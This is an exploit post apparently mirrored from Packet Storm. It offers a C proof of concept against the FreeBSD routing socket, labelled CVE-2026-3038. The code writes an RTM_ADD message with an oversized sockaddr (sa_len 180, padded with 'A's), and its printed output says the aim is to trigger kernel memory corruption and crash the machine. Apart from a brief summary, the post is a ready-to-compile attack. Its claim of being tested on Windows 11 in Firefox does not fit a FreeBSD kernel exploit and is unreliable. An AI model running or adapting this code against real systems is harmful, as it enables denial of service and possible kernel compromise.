Share
## https://sploitus.com/exploit?id=PACKETSTORM:216221
=============================================================================================================================================
| # Title : FreeBSD Routing Socket Input Validation Analysis โ Oversized sockaddr in RTM_ADD |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.freebsd.org/ |
=============================================================================================================================================
[+] Summary : PoC attempts to test the robustness of the FreeBSD routing socket subsystem by crafting a RTM_ADD message containing an
intentionally oversized sockaddr structure (sa_len greater than the traditional sockaddr_storage limit of 128 bytes).
4 you https://packetstorm.news/files/id/216124/
[+] POC :
#include <sys/types.h>
#include <sys/socket.h>
#include <net/route.h>
#include <net/if.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#define ROUNDUP(a) \
((a) > 0 ? (1 + (((a) - 1) | (sizeof(long) - 1))) : sizeof(long))
struct malicious_sockaddr {
unsigned char sa_len;
unsigned char sa_family;
char sa_data[254];
};
int main() {
int s;
char buf[1500];
struct rt_msghdr *rtm;
struct malicious_sockaddr *dst, *gw;
int l;
printf("[+] FreeBSD CVE-2026-3038 Local DoS PoC\n");
s = socket(PF_ROUTE, SOCK_RAW, AF_UNSPEC);
if (s < 0) {
perror("[-] socket(PF_ROUTE) failed");
return 1;
}
memset(buf, 0, sizeof(buf));
rtm = (struct rt_msghdr *)buf;
rtm->rtm_msglen = 0;
rtm->rtm_version = RTM_VERSION;
rtm->rtm_type = RTM_ADD;
rtm->rtm_addrs = RTA_DST | RTA_GATEWAY;
rtm->rtm_flags = RTF_UP | RTF_GATEWAY | RTF_STATIC;
rtm->rtm_pid = getpid();
rtm->rtm_seq = 42;
dst = (struct malicious_sockaddr *)(rtm + 1);
dst->sa_family = AF_INET;
dst->sa_len = 180;
memset(dst->sa_data, 'A', 170);
int dst_space = ROUNDUP(dst->sa_len);
gw = (struct malicious_sockaddr *)((char *)dst + dst_space);
gw->sa_family = AF_INET;
gw->sa_len = sizeof(struct sockaddr_in);
((struct sockaddr_in *)gw)->sin_addr.s_addr = inet_addr("127.0.0.1");
rtm->rtm_msglen = sizeof(struct rt_msghdr) + dst_space + ROUNDUP(gw->sa_len);
printf("[*] Sending packet: msglen=%d, dst->sa_len=%d\n", rtm->rtm_msglen, dst->sa_len);
printf("[!] Attempting to trigger kernel memory corruption...\n");
if (write(s, buf, rtm->rtm_msglen) < 0) {
fprintf(stderr, "[-] Result: %s\n", strerror(errno));
} else {
printf("[+] Packet accepted. If the system is vulnerable, it might crash now.\n");
}
close(s);
return 0;
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================